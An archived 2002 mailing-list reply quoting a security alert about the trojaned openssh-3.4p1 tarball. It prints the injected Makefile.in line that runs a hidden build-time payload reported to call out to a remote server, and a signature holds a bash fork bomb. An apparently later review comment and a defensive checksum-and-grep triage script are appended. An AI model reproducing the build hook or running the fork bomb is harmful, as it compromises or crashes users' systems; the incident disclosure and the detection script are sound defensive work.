[Savannah-hackers] Re: OpenSSH 3.4p1 trojaned
From: Jeff Bailey
Subject: [Savannah-hackers] Re: OpenSSH 3.4p1 trojaned
Date: Thu, 1 Aug 2002 11:57:58 -0700
User-agent: Mutt/1.3.28i
the Debian package isn't affected, either source or binary.
On Thu, Aug 01, 2002 at 02:55:41PM -0400, Mark H. Weaver wrote:
> http://lwn.net/Articles/6524/
>
> [...]
>
> Trojan horse in OpenSSH 3.4p1 source distribution
>
> From: Mikael Olsson <address@hidden>
> To: address@hidden
> Subject: openssh-3.4p1.tar.gz distribution recently trojaned
> Date: Thu, 01 Aug 2002 13:20:47 +0200
>
>
> From [27]http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
>
> ----- Forwarded message from Edwin Groothuis <address@hidden> -----
>
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <address@hidden>
> To: address@hidden
> Subject: openssh-3.4p1.tar.gz trojaned
>
> Greetings,
>
> Just want to inform you that the OpenSSH package on ftp.openbsd.org
> (and probably all its mirrors now) is trojaned:
>
>
> [28]ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>
> The OpenBSD people have been informed about it (via email to
> address@hidden and via irc.openprojects.org/#openbsd)
>
>
> The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
> all: libopenbsd-compat.a
> + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
> ./bf-test.out &
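Review bot: the `+` recipe line under `all:` runs `./bf-test`, writes its output to bf-test.out and hands that file to `sh` in the background, and the leading `@` keeps make from echoing the command, so anyone who builds this tree executes generated shell code without seeing it. Nothing in the `all: libopenbsd-compat.a` target needs to execute a freshly compiled helper; drop the line, and treat any tree whose Makefile.in contains it as compromised rather than building it.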
>
> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to a
> server running on 203.62.158.32:6667 (web.snsonline.net).
>
> [1] [29]http://www.mavetju.org/~edwin/bf-test.c
> [2] [30]http://www.mavetju.org/~edwin/bf-output.sh
>
> This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
> ports system:
> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
> This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
>
> Edwin
>
> --
> Edwin Groothuis | Personal website: [31]http://www.MavEtJu.org
> address@hidden | Weblog: [32]http://www.mavetju.org/weblog/weblog.php
> bash$ :(){ :|:&};: | Interested in MUDs? [33]http://www.FatalDimensions.org/
> __________________________________________
>
> Trojan horse in OpenSSH 3.4p1 source distribution
> (Posted Aug 01, 2002 15:07 UTC (Thu) by craighagan)
>
> This appears to be a FreeBSD ports thing. I build from
> sources downloaded from the openssh website within 24 hours
> of the release. I've double-checked said sources and
> do *not* see either the Makefile.in modification
> nor the bf-test.c source via find.
>
> I recommend other folks check their sources so that
> either the ports origin -- or a hack at openssh's distribution
> point can be confirmed.
>
> Trojan horse in OpenSSH 3.4p1 source distribution
> (Posted Aug 01, 2002 15:08 UTC (Thu) by craighagan)
>
> silly me. i forgot that -ports ftp's the software upon build.
>
> Trojan horse in OpenSSH 3.4p1 source distribution
> (Posted Aug 01, 2002 16:22 UTC (Thu) by erat)
>
> I built 3.4p1 last night from a tarball downloaded from openssh.com.
> No trojan found, and the checksum matched the "good" checksum from the
> security alert.
>
> Copyright © 2002, Eklektix, Inc.
> Linux ® is a registered trademark of Linus Torvalds
> Web hosting provided by [38]Rackspace.com.
>
> References
>
> 1. http://lwn.net/
> 2. http://php.lwn.net/corp/advertise/text/visit.php3?adid=382
> 3. http://php.lwn.net/mediakit/index.php3?s=t
> 4. http://lwn.net/login
> 5. http://lwn.net/newaccount
> 6. http://lwn.net/Articles/5712/
> 7. http://lwn.net/Articles/5052/
> 8. http://lwn.net/Articles/4553/
> 9. http://lwn.net/Articles/4151/
> 10. http://lwn.net/Articles/3668/
> 11. http://lwn.net/Articles/6524/?format=printable
> 12. http://lwn.net/
> 13. http://lwn.net/current/
> 14. http://lwn.net/Archives/
> 15. http://lwn.net/security
> 16. http://www.linuxcalendar.com/
> 17. http://old.lwn.net/Distributions/
> 18. http://old.lwn.net/Gallery/
> 19. http://lwn.net/KernelPatches/
> 20. http://old.lwn.net/stocks
> 21. http://old.lwn.net/
> 22. http://lwn.net/op/About.lwn/
> 23. http://php.lwn.net/corp/donate/
> 24. http://lwn.net/mediakit
> 25. http://lwn.net/headlines/
> 26. http://lwn.net/op/Privacy.lwn/
> 27. http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
> 28. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> 29. http://www.mavetju.org/~edwin/bf-test.c
> 30. http://www.mavetju.org/~edwin/bf-output.sh
> 31. http://www.MavEtJu.org/
> 32. http://www.mavetju.org/weblog/weblog.php
> 33. http://www.FatalDimensions.org/
> 34. http://lwn.net/login
> 35. http://lwn.net/Articles/6547/comment
> 36. http://lwn.net/Articles/6550/comment
> 37. http://lwn.net/Articles/6560/comment
> 38. http://www.rackspace.com/
>
--
I reincarnated for this?
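
A triage check built only from the indicators quoted in the report above (the two MD5 values, the `bf-test` recipe line in `openbsd-compat/Makefile.in`, and the `bf-test.c` file). It is an added example, not part of the original thread, and the function names are hypothetical. Run it on the tarball and the unpacked tree before `./configure` or `make`, since the reported payload runs at build time.

```shell
#!/bin/sh
# Added example: triage an openssh-3.4p1 tarball / unpacked tree using the
# indicators quoted in the report. Function names are hypothetical.
GOOD_MD5=459c1d0262e939d6432f193c7a4ba8a8   # FreeBSD ports checksum (from the report)
BAD_MD5=3ac9bc346d736b4a51d676faa2a08a57    # trojaned tarball (from the report)

# classify_md5 HEX -> prints clean | trojaned | unknown (case-insensitive)
classify_md5() {
    case "$(printf '%s' "$1" | tr 'A-F' 'a-f')" in
        "$GOOD_MD5") echo clean ;;
        "$BAD_MD5")  echo trojaned ;;
        *)           echo unknown ;;   # neither value: do not assume it is safe
    esac
}

# file_md5 PATH -> prints the hex digest (md5sum on Linux, md5 -q on the BSDs)
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        md5 -q "$1"
    fi
}

# scan_tree DIR -> prints each indicator found; returns 1 if any, 0 if none
scan_tree() {
    hits=0
    found=$(find "$1" -name 'bf-test.c' -print)
    if [ -n "$found" ]; then
        echo "unexpected file: $found"
        hits=1
    fi
    mk="$1/openbsd-compat/Makefile.in"
    # grep -n prints the offending recipe line with its line number
    if [ -f "$mk" ] && grep -n 'bf-test' "$mk"; then
        hits=1
    fi
    return "$hits"
}

# Usage: sh check.sh openssh-3.4p1.tar.gz [unpacked-dir]
if [ -n "$1" ] && [ -f "$1" ]; then
    echo "md5 verdict: $(classify_md5 "$(file_md5 "$1")")"
    if [ -n "$2" ]; then
        scan_tree "$2" || echo "tree carries trojan indicators: do not build"
    fi
fi
```

An `unknown` verdict means the file matches neither checksum in the report, which covers other releases as well as other modifications.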